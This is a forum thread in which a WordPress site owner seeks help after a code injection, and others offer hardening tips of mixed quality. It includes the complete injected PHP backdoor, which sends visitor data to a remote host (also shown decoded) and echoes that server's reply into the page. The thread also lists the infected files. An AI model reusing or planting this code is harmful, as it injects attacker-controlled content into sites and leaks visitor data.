I noticed some code injection on my site on November 24, at 3.33 am. Later google issue malware notice on my site. How to prevent these kind of code injection on wordpress site. Im on a VPS and please help me.
Do you have any contactforms on your site? They are fairly easy to use with an SQL injection. Other things you should check are: 1) Change your own passwords!! 2) Check your user in the wp-admin panel, delete the strange ones. 3) Check your plugins in the wp-admin panel, delete the strange ones. 4) Check your VPS server for other users (Like your FTP and MySQL users) and delete those too. 5) Check your files (.htacces for example) This will fix most the common issues, else you can always ask your hosting party for support. Too prevent this. 1) dont use contact forms 2) always update too the latest versions, plugins and wordpress 3) set up your writing permissions only where needed 4) use long passwords 5) place fake index.html in each directory 6) use plugins like better WP security
I use vault press also , updates and protection for about 15$ a month , good to be able to go through a achieve of backups just encase your site gets hit.
I suggest you to use .htaccess in your /wp-admin/ directory and put the IP only from your PC can log in. Always use strong password if need use captcha in admin login directory to prevent brute force attacks. If you use wordpress use BulletProffSecurity Plugin , its very good who can prevent injection codes in your site. - Juerald
Your problem is probably caused by poorly coded plugins/themes that contain security vulnerabilities. If you install something with a thousand backdoors no .htaccess tricks, changing passwords etc. will help you.
some reason you can get hack/inject - using null*d themes/plugin - using poor plugin/themes coding like devtard said - because the server is hacked - keylogger from your PC (rare but still they can steal your pass from this kind of method)
this is the code that was injected on my site. <?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?>
If it helps, the site that's getting the information (the base64 code in that mess) is http://browserglobalstat.com/statD/stat.php And whoever wrote it is a novice - it's loaded with pleonasms.
appreciate your effort. I removed these codes but i want to know how to improve security of my wordpress sites. Let me clear something here. I'm with hostgator shared hosting. All my sites with default wp installation got that code injected on Nov 24. so there is no question of nulled theme or plugin. I'm with inmotion hosting where i have a VPS where my main sites are hosted. They are clean but i code this code injected on Nov 23. one thing i can remember that i updated some plugin on Nov 23 and nov 24. but don't know which one caused.
You might want to start by downloading the plugin WP Security, this certainly helps against the most basic attacks.Any idea where they injected the code? You got a contactform on your website?
Do you manage multiple sites from one FTP account? I doubt that any "security" plugin will help in this case.
Initially there was contact form but i removed it months ago. List of Infected Pages. Under Wp-admin folder index.php Under Wp-content folder index.php Under Wp-content/plugins folder index.php Under Wp-content/themes/<theme name> folder index.php footer.php header.php page.php
There are some great security plugins out there just check em out. I use one called block bad queries it works really great, no problems. There are tons of really well rounded security plugins but some of them will screw up yoru blog bc i tried it before so be careful.